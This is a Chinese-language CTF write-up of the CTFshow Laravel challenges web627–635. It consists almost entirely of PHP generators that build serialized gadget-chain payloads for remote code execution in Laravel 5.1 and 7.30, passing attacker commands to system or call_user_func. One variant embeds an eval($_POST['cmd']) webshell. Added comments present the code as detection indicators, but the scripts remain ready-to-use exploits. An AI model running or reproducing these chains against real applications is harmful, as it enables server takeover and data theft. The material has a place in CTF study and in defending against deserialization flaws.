题目地址:https://ctf.show/challenges

前言:

好久没学习了，继续更新，学无止境。此系列为 CTFshow 的 Laravel 专题，主要整理 Laravel 框架的一些漏洞及 POC。自 9.1 新网络安全法更新以来，也不敢提供完整的漏洞复现，只总结一些相关的 POC 以及自己的学习经历。这里的总结也许并不完整，只能说是笔者尽量把自己所学所找的东西记录下来。

image-20210913014802231.png

web627

Laravel5.1 反序列化RCE
网上公开的 Laravel 框架利用链中并没有针对 5.1 版本的，所以得自己挖。
poc:

<?php
// Payload generator for web627 (Laravel 5.1 deserialization chain).
// Every class below is a local stand-in that only reuses the fully-qualified
// name and the property names of a vendor class, so that serialize() emits a
// string naming those vendor classes; none of the real classes' behaviour is
// present in this file. Usage: `php <this-file> '<command>'` prints the
// URL-encoded serialized object graph to stdout.
// Defender notes: the serialized output carries the literal class names
// (Swift_KeyCache_DiskKeyCache, Mockery\Generator\DefinedTargetClass,
// Faker\ValidGenerator, Faker\DefaultGenerator) and the literal callable name
// `system`, all of which are usable as detection indicators in request or
// session logs. The underlying weakness is unserialize() of attacker-controlled
// data; the mitigation is to never deserialize untrusted input (exchange data
// with json_decode instead).
namespace{
use Mockery\Generator\DefinedTargetClass;
// Outermost object of the chain; the private properties mirror the vendor class.
class Swift_KeyCache_DiskKeyCache{
    private $_keys=['bit'=>array('bit'=>'bit')];   // fixed, pre-populated nested array
    private $_path;                                 // holds the next object of the chain
    public function __construct($cmd){
        $this->_path=new DefinedTargetClass($cmd);
}
}
// $argv[1] is the command string, threaded down to Faker\DefaultGenerator::$default.
echo urlencode(serialize(new Swift_KeyCache_DiskKeyCache($argv[1])));
}
namespace Mockery\Generator{
use Faker\ValidGenerator;
// Intermediate link: wraps the next object in its single private property.
class DefinedTargetClass
{
    private $rfc;
    public function __construct($cmd)
    {
        $this->rfc=new ValidGenerator($cmd);
    }
}
}
namespace Faker{
// Leaf of the chain: carries the attacker-supplied string unchanged.
class DefaultGenerator{
    protected $default;
    public function __construct($cmd)
    {
        $this->default = $cmd;
    }
}
// Holds the leaf object plus two literal values; the stand-in has no methods
// other than the constructor.
class ValidGenerator
{
    protected $generator;
    protected $validator;
    protected $maxRetries;
    public function __construct($cmd){
    $this->generator=new DefaultGenerator($cmd);
    $this->maxRetries=9;           // fixed integer, copied into the payload
    $this->validator='system';     // literal callable name stored in the payload (detection indicator)
}
}
}
?>

web628

Laravel5.1 反序列化RCE
RCE 姿势2
poc:

<?php
// Payload generator for web628 (Laravel 5.1 deserialization chain, variant 2).
// Same outer class as the web627 listing; the inner links are stand-ins that
// reuse the names of phpDocumentor and Illuminate vendor classes, with no
// vendor behaviour present here. Usage: `php <this-file> '<command>'` prints
// the URL-encoded serialized object graph.
// Defender notes: the serialized string contains the class names
// phpDocumentor\Reflection\DocBlock\Tags\Deprecated and
// Illuminate\Database\DatabaseManager together with the literals `system` and
// `call_user_func`; these are detection indicators. Mitigation is the same as
// for every chain on this page: do not pass untrusted input to unserialize().
namespace{
use phpDocumentor\Reflection\DocBlock\Tags\Deprecated;
// Outermost object of the chain; private properties mirror the vendor class.
class Swift_KeyCache_DiskKeyCache{
    private $_keys=['bit'=>array('bit'=>'bit')];   // fixed, pre-populated nested array
    private $_path;                                 // holds the next object of the chain
    public function __construct($cmd){
        $this->_path=new Deprecated($cmd);
}
}
// $argv[1] is the command string, used as array key and value inside DatabaseManager.
echo urlencode(serialize(new Swift_KeyCache_DiskKeyCache($argv[1])));
}
namespace phpDocumentor\Reflection\DocBlock\Tags{
    use Illuminate\Database\DatabaseManager;
    // The property lives on the abstract parent so that serialize() records it
    // under the same name the vendor hierarchy uses.
    abstract class BaseTag{
        protected $description;
    }
        final class Deprecated extends BaseTag{
    public function __construct($cmd){
        $this->description=new DatabaseManager($cmd);
    }
    }
}
namespace Illuminate\Database{
// Leaf of the chain. $app starts as null and is auto-vivified into nested
// arrays by the index assignments below; $extensions likewise becomes a
// one-element array keyed by the command string.
class DatabaseManager{
    protected $app;
    protected $extensions ;
    public function __construct($cmd)
    {
        $this->app['config']['database.default']=$cmd;
        $this->app['config']['database.connections']=array($cmd=>'system');   // literal callable name (detection indicator)
        $this->extensions[$cmd]='call_user_func';                              // literal callable name (detection indicator)
    }
}

}
?>

web629-630

Laravel5.1 反序列化RCE
RCE 姿势3-4
poc:

<?php
// Payload generator for web629-630 (Laravel 5.1 deserialization chain,
// variants 3-4 share this one script). As in the other listings, every class
// is a local stand-in that only reproduces a vendor class's fully-qualified
// name and property names; no vendor behaviour is present. Usage:
// `php <this-file> '<command>'` prints the URL-encoded serialized object graph.
// Defender notes: the serialized string names Prophecy\Argument\Token\ObjectStateToken,
// Mockery\Generator\MockDefinition, Illuminate\Validation\Validator,
// Faker\DefaultGenerator, Mockery\Loader\EvalLoader and Illuminate\Session\Store;
// the presence of these vendor class names inside a serialized blob arriving
// from a client is a detection indicator. Mitigation: never unserialize()
// untrusted input.
namespace{
use Prophecy\Argument\Token\ObjectStateToken;
// Outermost object of the chain; private properties mirror the vendor class.
class Swift_KeyCache_DiskKeyCache{
    private $_keys=['bit'=>array('bit'=>'bit')];   // fixed, pre-populated nested array
    private $_path;                                 // holds the next object of the chain
    public function __construct($cmd){
        $this->_path=new ObjectStateToken($cmd);
}
}
// $argv[1] is the command string, stored in MockDefinition::$code.
echo urlencode(serialize(new Swift_KeyCache_DiskKeyCache($argv[1])));
}
namespace Prophecy\Argument\Token{
    use  Mockery\Generator\MockDefinition;
    use Illuminate\Validation\Validator;
    // Fans out into two sub-chains: $value (MockDefinition) and $util (Validator).
    class ObjectStateToken{
        private $name;
        private $value;
        private $util;
        public function __construct($cmd){
            $this->name='bit';                       // fixed placeholder string
            $this->value=new MockDefinition($cmd);
            $this->util=new Validator();
        }
    }
}

namespace Illuminate\Validation{
    use Faker\DefaultGenerator;
    // Stand-in with one string extension and a nested DefaultGenerator.
    class Validator{
    protected $container;
    protected $extensions = [];
    public function __construct(){
        $this->extensions['y']='xxx@load';           // 'Class@method'-style string; its meaning is in the target framework, not here
        $this->container=new DefaultGenerator();
    }
}
}
namespace Faker{
    use Mockery\Loader\EvalLoader;
// Unlike the web627 listing, this DefaultGenerator takes no argument and wraps
// an EvalLoader instead of the command string.
class DefaultGenerator
{
    protected $default;

    public function __construct()
    {
        $this->default = new EvalLoader();
}
}
}
namespace Mockery\Loader{
    // Empty stand-in: only the class name is needed in the serialized string.
    class EvalLoader{}
}
namespace Mockery\Generator{
    use Illuminate\Session\Store;
    // Carries the command string in $code next to a Store object in $config.
    class MockDefinition{
        protected $config;
        protected $code;
        public function __construct($cmd){
            $this->config=new Store();
            $this->code=$cmd;
        }
    }
}
namespace Illuminate\Session{
    class Store{
        protected $name='bit';// a class that does not exist is enough here (original author's note, translated)
    }
}
?>

web631-634

Laravel7.30 反序列化RCE
RCE 姿势1-4
poc:

<?php
// Payload generator for web631-634 (Laravel 7.30 deserialization chain,
// variants 1-4 share this script). Both classes are local stand-ins reusing
// Illuminate class names and property names, with no framework behaviour
// present. Usage: `php <this-file> '<command>'` prints the URL-encoded
// serialized object.
// Defender notes: the serialized string contains
// Illuminate\Routing\PendingResourceRegistration and
// Illuminate\Validation\Validator alongside the literals `call_user_func` and
// `system`; these make useful detection indicators. Mitigation: do not
// unserialize() data that a client can influence.
namespace Illuminate\Routing{
    use Illuminate\Validation\Validator;
    // Outermost object; three of its properties are fixed literals and
    // $options carries the attacker-supplied string.
    class PendingResourceRegistration
{
    protected $registrar;
    protected $registered = false;
    protected $name='call_user_func';    // literal callable name (detection indicator)
    protected $controller='system';      // literal callable name (detection indicator)
    protected $options;
    public function __construct($cmd){
        $this->registrar=new Validator();
        $this->options=$cmd;
    }
}
// $argv[1] is the command string stored in $options.
echo urlencode(serialize(new PendingResourceRegistration($argv[1])));
}
namespace Illuminate\Validation{
    // Stand-in with a single extension keyed by the empty string.
    class Validator{    
        public $extensions = [];
        public function __construct(){
            $this->extensions['']='call_user_func';   // literal callable name (detection indicator)
        }
    }
}
?>

web635

Laravel7.30 反序列化RCE
RCE 姿势5
poc:

<?php
// Payload generator for web635 (Laravel 7.30 deserialization chain, variant 5).
// This variant takes no command-line argument: the PHP source to be carried is
// a fixed string inside MockClass. All classes are local stand-ins reusing
// vendor class and property names, with no vendor behaviour present.
// Usage: `php <this-file>` prints the URL-encoded serialized object.
// Defender notes: the serialized string contains
// Illuminate\View\InvokableComponentVariable, PHPUnit\Framework\MockObject\MockClass
// and the literal source fragment `eval($_POST["cmd"]);` — a high-signal
// detection indicator for logs and WAF rules. Mitigation: never unserialize()
// untrusted input.
namespace Illuminate\Routing{
    use Illuminate\View\InvokableComponentVariable;
    // Outermost object; only $registrar is populated.
    class PendingResourceRegistration
{
    protected $registrar;
    protected $registered = false;
    public function __construct(){
        $this->registrar=new InvokableComponentVariable();
    }
}
echo urlencode(serialize(new PendingResourceRegistration()));
}
namespace Illuminate\View{
    use PHPUnit\Framework\MockObject\MockClass;
    // Stores an array-form callable [object, 'generate']; the method itself is
    // not defined in this file.
    class InvokableComponentVariable{
        protected $callable;
        public function __construct(){
            $this->callable=array(new MockClass(),'generate');
        }
    }
}
namespace PHPUnit\Framework\MockObject{
    // Leaf of the chain: three fixed private properties.
    class MockClass{
        private $classCode;
        private $mockName;
        private $configurableMethods;
        public function __construct(){
            $this->classCode='eval($_POST["cmd"]);';   // PHP source carried as data; eval on POST input (detection indicator)
            $this->mockName='bit';                     // fixed placeholder string
            $this->configurableMethods='bit';          // fixed placeholder string
        }
    }
}

